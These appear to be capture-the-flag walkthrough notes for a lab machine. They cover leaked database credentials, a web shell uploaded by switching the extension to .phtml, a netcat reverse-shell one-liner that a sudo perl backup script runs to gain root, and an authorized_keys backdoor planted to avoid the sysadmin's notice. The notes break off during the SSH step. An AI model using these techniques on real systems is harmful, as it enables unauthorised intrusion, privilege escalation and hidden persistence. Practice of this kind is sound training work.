----------

IN ADMIN PORTAL SETTINGS TAB:
Database Setting

    Database : mysql
    Database Host : localhost
    Database Port : 3306
    Database Account : rice
    Database Password : randompass

Database Name
website
Database Prefix
v

-------------

Trying to upload shell.php didnt work - eventually assumed there must be a filter so changed the extension to shell.phtml - THIS WORKED!

---------------------

navigated to /home/itguy/

found the user.txt flag!

cat mysql_login.txt
rice:randompass


-------------------------

Copy and paste the following into your hacked shell:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local-ip> 5554 >/tmp/f' >/etc/copy.sh

- Making sure to change the local ip and port number to an appropriate one
- Make sure another netcat listener is set up during this with port number corresponding to line above.

After this copy and paste the following line into your hacked machine command line:

sudo /usr/bin/perl /home/itguy/backup.pl

it will produce an error, HOWEVER if you check your other netcat listener you should see that you now have root access!

read root flag!

---------------------------------------

ALTERNATIVE EXPLOIT

Think back to the original nmap enumeration we did way back at the beginning of this box. There were two ports open: port 80 for the webserver, and port 22 for SSH.

-> Use SSH Port 

We already have a root shell, so this should be a dawdle.

We still don’t know the root password, and changing it would be a slight giveaway to the sysadmin that their server had been hacked.

The first thing that I tried to do here was copying my own public key into the /root/.ssh/authorized_keys file on the remote machine (having to make the file in the process). This worked, letting me straight into the remote machine when I tried SSHing into it from my local computer:
